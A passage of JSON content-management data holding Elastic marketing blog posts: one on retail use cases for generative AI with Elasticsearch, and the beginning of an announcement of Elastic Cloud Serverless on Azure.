16, 26);font-size: 12pt;\"\u003e to omnichannel marketing and even predictive maintenance in supply chains. In fact, the many promising retail use cases for generative AI, which executives previously predicted would take years to achieve, might ultimately be delivered in the very near future.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003eHowever, retailers are understandably cautious in their approach to this technology due to the notable limitations of GAI. In a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/generative-ai-retail-cpg\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eprevious blog post\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003e, we discussed both the benefits and the risks retailers are presented with when considering implementing GAI technology in their organizations, as well as how the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/may-2023-launch-announcement\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Relevance Engine™ (ESRE™)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003e can help overcome challenges and create new opportunities. With its flexible suite of tools, ESRE lets businesses build AI-powered search applications, merging the capabilities of machine learning with text search. ESRE also empowers ecommerce developers to enhance search applications by employing sophisticated algorithms that integrate with large language models. Furthermore, ESRE effectively addresses challenges of GAI related to privacy, scalability, and cost, thereby enabling retailers to create search experiences that build on user intent to deliver improved customer experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003eIn this blog post, we’ll explore \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003epossible use cases for GAI\u003c/a\u003e in retail and how ESRE can be applied to help organizations create the ultimate user experience in their applications.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0b410f38aa5b9af2"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt6d4e040eb1e62e14","ACL":{},"content_type":"image/png","created_at":"2023-07-07T14:40:17.376Z","created_by":"bltb6c155cd84fc0c1a","file_size":"250954","filename":"elastic-blog-2-bridge-data-gai.png","parent_uid":null,"tags":[],"title":"elastic-blog-2-bridge-data-gai.png","updated_at":"2023-07-07T14:40:17.376Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-12T15:00:00.519Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6d4e040eb1e62e14/64a823d1ee0ad390bfbeb318/elastic-blog-2-bridge-data-gai.png"},"_metadata":{"uid":"csc0c0225e32c640db"},"caption_l10n":"","alt_text_l10n":"bridge data generative AI ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Retail use cases for generative AI and ESRE","_metadata":{"uid":"csc18bbdb13b6573ad"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere has already been plenty of discussion around the seemingly infinite number of GAI use cases in retail. But as retailers start exploring the potential of this technology, a number of those use cases stand out:\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Personalized search experiences","_metadata":{"uid":"csad0cf02d37d0e62c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003ePersonalization enables organizations to offer highly tailored experiences that appeal more directly to the specific interests or pain points of a customer or employee. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-personalize-search-experiences-using-elastic\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch technology\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003e is already powering the personalized digital experiences that customers experience everyday. In fact, 88% of online shoppers are more likely to continue to shop on websites that offer a personalized experience, according to a study by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/explore/improving-digital-customer-experiences/personalizations-critical-role-in-converting-ecommerce-searches-into-sales?cee-gic\u0026elektra=ecommerce-blog\"\u003e\u003cspan style='font-size: 12pt;'\u003eWakefield Research\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003eESRE provides robust search capabilities, allowing retailers to build fast, highly relevant search experiences for their online stores. When combined with the generative capabilities of large language models, customers can get results tailored to their location, demographic, or preference — leading to improved customer satisfaction and conversion rates. Precision context windows with Elastic also help reduce data footprint and expenses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Enhanced customer service","_metadata":{"uid":"csfb2568f9a8b92559"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003eOutstanding support starts with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/customer-support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003egetting answers for your customers\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003e. \u003ca href=\"https://www.elastic.co/what-is/generative-ai\" target=\"_self\"\u003eGenerative AI\u003c/a\u003e can analyze and learn from historical customer data including customer support interactions, from emails and chat logs to support tickets. It can generate automated responses based on this data, providing quick and accurate answers to frequently asked questions or common issues. This saves time for both customers and support agents, streamlines self-service support, and allows agents to focus on more complex or personalized inquiries.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003eESRE serves as the perfect backbone for this use case, helping customers find information quickly and easily with semantic search. The Elasticsearch Relevance Engine includes a proprietary out-of-the-box semantic search model as well as a production grade vector database and hybrid search ranking. It gives developers a flexible foundation on which to build rich semantic search, vector search, and hybrid search applications, which can be used by service agents. Elastic also includes native support for role-based and attribute-based access control, so customers and agents only see information they have access to.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Sophisticated fraud detection","_metadata":{"uid":"cs888f8420ea594ac8"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003eGAI holds immense potential for the retail industry by aiding in the identification of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/accelerate-fraud-detection-and-prevention-with-elastic\"\u003e\u003cspan style='font-size: 12pt;'\u003efraudulent activities\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003e and the detection of anomalies. Through the process of pattern learning from existing data, generative models can predict new data points that align with the learned patterns. Retailers can leverage these capabilities in combination with Elastic to compare real-time customer interactions and transactions with predicted patterns. This integrated approach helps retailers proactively identify uncommon or fraudulent behavior that may otherwise elude detection through conventional rule-based systems alone.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Modernized brick-and-mortar","_metadata":{"uid":"cse53b34df1150c519"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003eNew technology that enables a guided shopping experience is becoming more prevalent. Retailers can now imitate the online shopping experience by pairing real-time demographic information with potential purchase preferences. This information is then correlated, in real time, with in-store video screens — such as smart shelves — which aim to deliver this information as part of the interactive experience of choosing a product. This amounts to dynamically combining data across disparate sources and presenting it together with a unified experience. Generative AI coupled with ESRE makes this task easier with a single platform to consume data and insights. This is done while enabling privacy and security via Elastic’s native support for role-based and attribute-based access controls.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Predictive maintenance","_metadata":{"uid":"cs996279ecf44dd878"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003eRetailers can collect data from various sources, such as sensors, equipment logs, and historical maintenance records, to build a comprehensive data set. With Elastic, powered by ESRE, retailers can activate this information to automate monitoring, accelerate root cause analysis, and \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=twkEYj7HGDE\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eoptimize operations by applying machine learning\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003e. This helps drive increased productivity, faster innovation, and more trustworthy customer experiences. Retailer supply chain and operations teams can continuously monitor this data in real time to identify patterns and anomalies that may indicate potential inventory issues or equipment failures.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdc65d9ce748af856"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"bltab22a7c47e075364","ACL":{},"content_type":"image/png","created_at":"2023-07-07T14:44:10.057Z","created_by":"bltb6c155cd84fc0c1a","file_size":"221890","filename":"elastic-blog-3-search-very-soon.png","parent_uid":null,"tags":[],"title":"elastic-blog-3-search-very-soon.png","updated_at":"2023-07-07T14:44:10.057Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-12T15:00:00.338Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltab22a7c47e075364/64a824bacef8c5deff7049e7/elastic-blog-3-search-very-soon.png"},"_metadata":{"uid":"cs72ea8f1259f6bfa6"},"caption_l10n":"Elasticsearch + GAI can bring greater context to search, enabling more personalized results for users","alt_text_l10n":"Search very soon","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdcc50b5e5d549b2f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 16, 26);font-size: 12pt;'\u003eIn an industry where competition is sky-high and differentiation is key, retailers must constantly innovate to remain relevant in the market. With ESRE, retailers can enhance their search capabilities to deliver more accurate and relevant results to their customers and employees, while ensuring sensitive data remains protected. By combining GAI with the powerful capabilities of Elastic, retailers can better understand their customers, adapt to market changes, and deliver exceptional experiences.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8501180579c128c3"}}},{"video":{"vidyard_uuid":"JbViktqzsHKA3ezJoh3Y8w","_metadata":{"uid":"cs240fa6016b72e9ee"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":false,"hide_controls":false,"looping_animation":false}},{"callout":{"title_l10n":"Learn more: ","_metadata":{"uid":"cs46bf7ed16ce5944a"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/may-2023-launch-announcement\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIntroducing Elasticsearch Relevance Engine™ — Advanced search for the AI revolution\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://build.microsoft.com/en-US/sessions/058e20eb-5607-4180-9915-7572ef591c40\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eMicrosoft Build Interview: Power the future of AI with Elasticsearch\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/ecommerce\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Ecommerce Search\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/industries/retail-ecommerce\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic for retailers\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/improving-digital-customer-experiences/forrester-total-economic-impact-elasticsearch\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Total Economic Impact™ of Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csea9bfb40a7cd0d9f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs034294d3209d32ce"}}}],"publish_date":"2023-07-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt371b46b1f7be39e3","ACL":{},"created_at":"2020-06-17T03:24:44.114Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retail","label_l10n":"Retail","tags":[],"title":"Retail","updated_at":"2020-07-06T22:17:35.972Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.835Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt920fd113a20929a5","ACL":{},"created_at":"2023-11-06T20:38:46.745Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ecommerce-search","label_l10n":"Ecommerce search","tags":[],"title":"Ecommerce search","updated_at":"2023-11-06T20:38:46.745Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.165Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3184f3496194138e","ACL":{},"created_at":"2023-11-06T20:36:32.173Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-support","label_l10n":"Customer support","tags":[],"title":"Customer support","updated_at":"2023-11-06T20:36:32.173Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.257Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt226f04bb0dd0936b","ACL":{},"created_at":"2023-11-06T20:46:35.144Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"personalization","label_l10n":"Personalization","tags":[],"title":"Personalization","updated_at":"2023-11-06T20:46:35.144Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:12.713Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3c3c124c70b20f1e","ACL":{},"created_at":"2023-11-06T20:47:25.066Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"predictive-analytics","label_l10n":"Predictive analytics","tags":[],"title":"Predictive analytics","updated_at":"2023-11-06T20:47:25.066Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:06.368Z","user":"blt06083bb707628f5c"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltfb1e89b001674db9","ACL":{},"created_at":"2023-11-06T21:30:17.252Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"relevance","label_l10n":"Relevance","tags":[],"title":"Relevance","updated_at":"2023-11-06T21:30:17.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.339Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Anomaly detection","label_l10n":"Anomaly detection","keyword":"anomaly-detection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7478459fe32592c5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:06.777Z","updated_at":"2023-11-06T20:08:06.777Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.738Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltedaba1c436cb0ded","ACL":{},"created_at":"2023-11-06T20:40:47.717Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"information-retrieval","label_l10n":"Information retrieval","tags":[],"title":"Information retrieval","updated_at":"2023-11-06T20:40:47.717Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:37.018Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt4dfe5f7864870ffc","created_by":"bltac225ac457fe0293","updated_by":"bltac225ac457fe0293","created_at":"2022-09-21T01:08:46.813Z","updated_at":"2022-09-21T01:08:46.813Z","content_type":"image/jpeg","file_size":"179223","filename":"01-shopping-bag.jpg","title":"01-shopping-bag.jpg","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-21T01:09:38.776Z","user":"bltac225ac457fe0293"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4dfe5f7864870ffc/632a641e72f6ac30ff64bc27/01-shopping-bag.jpg"},"title":"5 stand-out retail use cases for generative AI + Elasticsearch","title_l10n":"5 stand-out retail use cases for generative AI + Elasticsearch","updated_at":"2025-02-06T02:33:52.985Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/retail-use-cases-generative-ai-elasticsearch","publish_details":{"time":"2025-02-06T02:34:04.321Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0807a52ad0dfe8c3","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic is excited to announce the technical preview of Elastic Cloud Serverless on Microsoft Azure. Built on the industry-first Search AI Lake architecture, it combines vast storage, low-latency querying, and advanced AI capabilities. ","author":["bltf6c23ea28fef643d"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-01-30T23:42:54.691Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0d316df54c520e38"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eToday, we are excited to announce the technical preview of Elastic Cloud Serverless on Microsoft Azure — now available in the EastUS region. Elastic Cloud Serverless provides the fastest way to start and scale security, observability, and search solutions without managing infrastructure. Built on the industry-first \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/search-ai-lake-elastic-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch AI Lake architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — which relies on Azure Blob Storage — it combines vast storage, separate storage and compute, low-latency querying, and advanced AI capabilities to deliver uncompromising speed and scale.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Start and scale quickly with Elastic Cloud Serverless on Azure","_metadata":{"uid":"cs9f69a50150392887"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eNo compromise on speed or scale:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elasticsearch Serverless dynamically scales to accommodate your workload, handling unpredictable traffic and data spikes automatically — all while offering low-latency search on boundless object storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eHassle-free operations:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Say goodbye to managing clusters, provisioning nodes, or fine-tuning performance. Free your team from operational tasks — no need to manage infrastructure, do capacity planning, upgrade, or scale data.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePurpose-built product experience:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic Cloud Serverless provides a new, streamlined workflow to help you create projects tailored to your unique use cases in search, observability, and security. With guided onboarding, you can use in-product resources and tools that guide you every step of the way, accelerating time to value.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSimplified pricing model: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud Serverless offers a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-cloud-serverless-pricing-packaging\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eflexible, usage-based pricing model\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that scales with your needs. The solution-specific pricing aligns costs with actual usage, offering greater flexibility and cost predictability. Pay only for what you use — whether it’s for data ingested and retained in Elastic Security and Observability products or for compute resources in Elasticsearch.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSecurity and compliance certified\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic Cloud Serverless is certified under \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-cloud-serverless-achieves-major-compliance-certifications\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eseveral industry-leading frameworks\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, including SOC 2 Type 2, ISO 27001, ISO 27017, ISO 27018, PCI DSS, HIPAA, and CSA STAR — meeting stringent security and regulatory compliance standards.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Getting started with Elastic Cloud Serverless on Azure","_metadata":{"uid":"cs08f7968de3c2001d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen you \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style='font-size: 12pt;'\u003esign up\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style='font-size: 12pt;'\u003elog in\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to the Elastic Cloud console, you can create a serverless project by specifying the type of project you want (Elasticsearch, Elastic Observability, or Elastic Security). If you choose an Observability or Security project, select Azure as the cloud provider and EastUS as the region. For an Elasticsearch project, choose the use case (“General Purpose” or “Optimized for Vectors”), and then select Azure as the cloud provider and EastUS as the region. After clicking \"Create project,\" your Elastic Cloud Serverless project will be provisioned within minutes.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVisit our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003edocumentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to learn more.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What’s next?","_metadata":{"uid":"csbe77f81968acc0a4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are just getting started. As we continue enhancing Elastic Cloud Serverless on Azure, we plan to expand its availability across additional Azure regions and introduce new features to further enhance performance and usability. Stay tuned for exciting updates as we bring the full power of Elastic’s solutions to Azure users.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe future of search, security, and observability is here without compromise on speed, scale, or cost. Experience Elastic Cloud Serverless and Search AI Lake to unlock new opportunities with your data. \u003c/span\u003e\u003ca 